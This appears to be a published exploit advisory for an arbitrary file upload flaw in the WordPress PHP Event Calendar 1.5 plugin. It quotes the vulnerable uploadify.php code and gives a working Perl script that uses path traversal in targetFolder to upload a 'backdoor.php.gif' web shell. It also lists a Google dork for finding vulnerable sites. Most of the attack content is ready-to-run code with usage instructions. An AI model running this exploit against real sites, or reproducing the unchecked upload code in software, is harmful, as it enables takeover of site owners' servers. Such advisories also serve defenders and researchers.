WordPress PHP Event Calendar 1.5 Arbitrary File Upload

2015.04.04
Credit: CrashBandicot (@DosPerl)
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-264
Dork: inurl:/plugins/php-event-calendar/

###################################################################### # Exploit Title: Wordpress PHP Event Calendar Plugin - Arbitrary File Upload # Google Dork: inurl:/plugins/php-event-calendar/ # Date: 02.04.2015 # Exploit Author: CrashBandicot (@DosPerl) # Source Plugin: https://wordpress.org/plugins/php-event-calendar/ # Vendor HomePage: http://phpeventcalendar.com/ # Version: 1.5 # Tested on: MSwin ###################################################################### # Path of File : /wp-content/plugins/php-event-calendar/server/classes/uploadify.php # Vulnerable File : uploadify.php <?php /* Uploadify Copyright (c) 2012 Reactive Apps, Ronnie Garcia Released under the MIT License <http://www.opensource.org/licenses/mit-license.php> */ // Define a destination //$targetFolder = '/uploads'; // Relative to the root $targetFolder = $_POST['targetFolder']; // wp upload directory $dir = str_replace('\\','/',dirname(__FILE__)); //$verifyToken = md5('unique_salt' . $_POST['timestamp']); if (!empty($_FILES)) { $tempFile = $_FILES['Filedata']['tmp_name']; //$targetPath = $dir.$targetFolder; $targetPath = $targetFolder; $fileName = $_POST['user_id'].'_'.$_FILES['Filedata']['name']; $targetFile = rtrim($targetPath,'/') . '/' . $fileName; // Validate the file type $fileTypes = array('jpg','jpeg','gif','png'); // File extensions $fileParts = pathinfo($_FILES['Filedata']['name']); if (in_array($fileParts['extension'],$fileTypes)) { move_uploaded_file($tempFile,$targetFile); echo '1'; } else { echo 'Invalid file type.'; } } ?> # Exploit #!/usr/bin/perl use LWP::UserAgent; system(($^O eq 'MSWin32') ? 'cls' : 'clear'); print "\t +===================================================\n"; print "\t | PHP event Calendar Plugin - Arbitrary File Upload \n"; print "\t | Author: CrashBandicot\n"; print "\t +===================================================\n\n"; die "usage : perl $0 backdoor.php.gif" unless $ARGV[0]; $file = $ARGV[0]; my $ua = LWP::UserAgent->new( agent => q{Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36},); my $ch = $ua->post("http://127.0.0.1/wp-content/plugins/php-event-calendar/server/classes/uploadify.php", Content_Type => 'form-data', Content => [ 'Filedata' => [$file] , targetFolder => '../../../../../' , user_id => '0day' ])->content; if($ch = ~/1/) { print "\n [+] File Uploaded !"; } else { print "\n [-] Target not Vuln"; } __END__ # Path Shell : http://localhost/0day_backdoor.php.gif


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top